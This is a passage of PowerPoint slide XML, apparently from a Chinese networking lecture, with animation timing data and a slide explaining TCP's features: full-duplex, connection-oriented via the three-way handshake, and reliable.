                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="33795"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="33795"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y-#ppt_h/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="15" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="33795"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="16" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="33795"/>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3804"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="20" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="33804"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="21" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="33804"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="22" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="33804"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="23" presetID="53" presetClass="entr" presetSubtype="16" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="24" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="33806"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="25" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="33806"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="26" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="33806"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="27" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="33806"/>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3805"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="31" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="33805"/>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3803"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="34" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="33803"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffec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3380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80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797"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="44" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3379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802"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="47" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3380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33798"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="52" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3379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3807"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="55" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3380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3812"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="60" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3381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33811"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="63" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="338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3799"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="68" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3379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808"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="71" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="33808"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="72" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="73" presetID="17" presetClass="entr" presetSubtype="10" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="74" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="33809"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="75" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="33809"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="76" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="33809"/>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33810"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="79" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="33810"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="80" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="338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796" grpId="0" animBg="1"/>
      <p:bldP spid="33797" grpId="0" animBg="1"/>
      <p:bldP spid="33798" grpId="0" animBg="1"/>
      <p:bldP spid="33799" grpId="0" animBg="1"/>
      <p:bldP spid="33800" grpId="0" animBg="1"/>
      <p:bldP spid="33801" grpId="0" bldLvl="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="33802" grpId="0" bldLvl="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="33803" grpId="0" bldLvl="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="33805" grpId="0" bldLvl="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="33807" grpId="0" bldLvl="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="33808" grpId="0" bldLvl="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="33809" grpId="0" animBg="1"/>
      <p:bldP spid="33810" grpId="0" bldLvl="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="33811" grpId="0" animBg="1"/>
      <p:bldP spid="33812" grpId="0" bldLvl="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2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>TCP协议的特点</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34819" name="Freeform 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="611188" y="1447800"/>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36629D"/>
          </a:solidFill>
          <a:ln w="55000" cmpd="thickThin">
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:bevel/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="109695" tIns="109695" rIns="109695" bIns="10969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z="2100">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:sym typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>全双工连接</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2100">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(full-duplex connection)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2100">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34820" name="Freeform 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="611188" y="2055813"/>
            <a:ext cx="8281987" cy="347662"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 8280920"/>
              <a:gd name="T1" fmla="*/ 0 h 347760"/>
              <a:gd name="T2" fmla="*/ 8291592 w 8280920"/>
              <a:gd name="T3" fmla="*/ 0 h 347760"/>
              <a:gd name="T4" fmla="*/ 8291592 w 8280920"/>
              <a:gd name="T5" fmla="*/ 346780 h 347760"/>
              <a:gd name="T6" fmla="*/ 0 w 8280920"/>
              <a:gd name="T7" fmla="*/ 346780 h 347760"/>
              <a:gd name="T8" fmla="*/ 0 w 8280920"/>
              <a:gd name="T9" fmla="*/ 0 h 347760"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 60000 65536"/>
              <a:gd name="T13" fmla="*/ 0 60000 65536"/>
              <a:gd name="T14" fmla="*/ 0 60000 65536"/>
              <a:gd name="T15" fmla="*/ 0 w 8280920"/>
              <a:gd name="T16" fmla="*/ 0 h 347760"/>
              <a:gd name="T17" fmla="*/ 8280920 w 8280920"/>
              <a:gd name="T18" fmla="*/ 347760 h 347760"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T10">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T11">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T12">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
              <a:cxn ang="T13">
                <a:pos x="T6" y="T7"/>
              </a:cxn>
              <a:cxn ang="T14">
                <a:pos x="T8" y="T9"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T15" t="T16" r="T17" b="T18"/>
            <a:pathLst>
              <a:path w="8280920" h="347760">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8280920" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8280920" y="347760"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3477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该连接的两端有两条彼此独立、方向相反的传输通道</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1" name="Freeform 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="611188" y="2403475"/>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3D5691"/>
          </a:solidFill>
          <a:ln w="55000" cmpd="thickThin">
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:bevel/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="109695" tIns="109695" rIns="109695" bIns="10969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z="2100">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:sym typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>面向连接</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2100">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(connection-oriented)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2100">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34822" name="Freeform 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="611188" y="3011488"/>
            <a:ext cx="8281987" cy="576262"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 8280920"/>
              <a:gd name="T1" fmla="*/ 0 h 575977"/>
              <a:gd name="T2" fmla="*/ 8291592 w 8280920"/>
              <a:gd name="T3" fmla="*/ 0 h 575977"/>
              <a:gd name="T4" fmla="*/ 8291592 w 8280920"/>
              <a:gd name="T5" fmla="*/ 578833 h 575977"/>
              <a:gd name="T6" fmla="*/ 0 w 8280920"/>
              <a:gd name="T7" fmla="*/ 578833 h 575977"/>
              <a:gd name="T8" fmla="*/ 0 w 8280920"/>
              <a:gd name="T9" fmla="*/ 0 h 575977"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 60000 65536"/>
              <a:gd name="T13" fmla="*/ 0 60000 65536"/>
              <a:gd name="T14" fmla="*/ 0 60000 65536"/>
              <a:gd name="T15" fmla="*/ 0 w 8280920"/>
              <a:gd name="T16" fmla="*/ 0 h 575977"/>
              <a:gd name="T17" fmla="*/ 8280920 w 8280920"/>
              <a:gd name="T18" fmla="*/ 575977 h 575977"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T10">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T11">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T12">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
              <a:cxn ang="T13">
                <a:pos x="T6" y="T7"/>
              </a:cxn>
              <a:cxn ang="T14">
                <a:pos x="T8" y="T9"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T15" t="T16" r="T17" b="T18"/>
            <a:pathLst>
              <a:path w="8280920" h="575977">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8280920" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8280920" y="575977"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="57597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通信双方在开始传输数据前，必须通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:sym typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:sym typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>三次握手</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:sym typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:sym typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>的方式在二者之间建立一条逻辑上的链路（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:sym typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>虚电路</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:sym typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>），用于传输数据</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3" name="Freeform 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="611188" y="3587750"/>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404E83"/>
          </a:solidFill>
          <a:ln w="55000" cmpd="thickThin">
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:bevel/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="109695" tIns="109695" rIns="109695" bIns="10969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z="2100">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:sym typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>可靠性</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2100">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(reliable)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2100">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34824" name="Freeform 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="611188" y="4195763"/>
            <a:ext cx="8281987" cy="619125"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 8280920"/>
              <a:gd name="T1" fmla="*/ 0 h 619447"/>
              <a:gd name="T2" fmla="*/ 8291592 w 8280920"/>
              <a:gd name="T3" fmla="*/ 0 h 619447"/>
              <a:gd name="T4" fmla="*/ 8291592 w 8280920"/>
              <a:gd name="T5" fmla="*/ 616235 h 619447"/>
              <a:gd name="T6" fmla="*/ 0 w 8280920"/>
              <a:gd name="T7" fmla="*/ 616235 h 619447"/>
              <a:gd name="T8" fmla="*/ 0 w 8280920"/>
              <a:gd name="T9" fmla="*/ 0 h 619447"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 60000 65536"/>
              <a:gd name="T13" fmla="*/ 0 60000 65536"/>
              <a:gd name="T14" fmla="*/ 0 60000 65536"/>
              <a:gd name="T15" fmla="*/ 0 w 8280920"/>
              <a:gd name="T16" fmla="*/ 0 h 619447"/>
              <a:gd name="T17" fmla="*/ 8280920 w 8280920"/>
              <a:gd name="T18" fmla="*/ 619447 h 619447"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T10">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T11">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T12">
                <a:pos x="T4" y="T5"/>
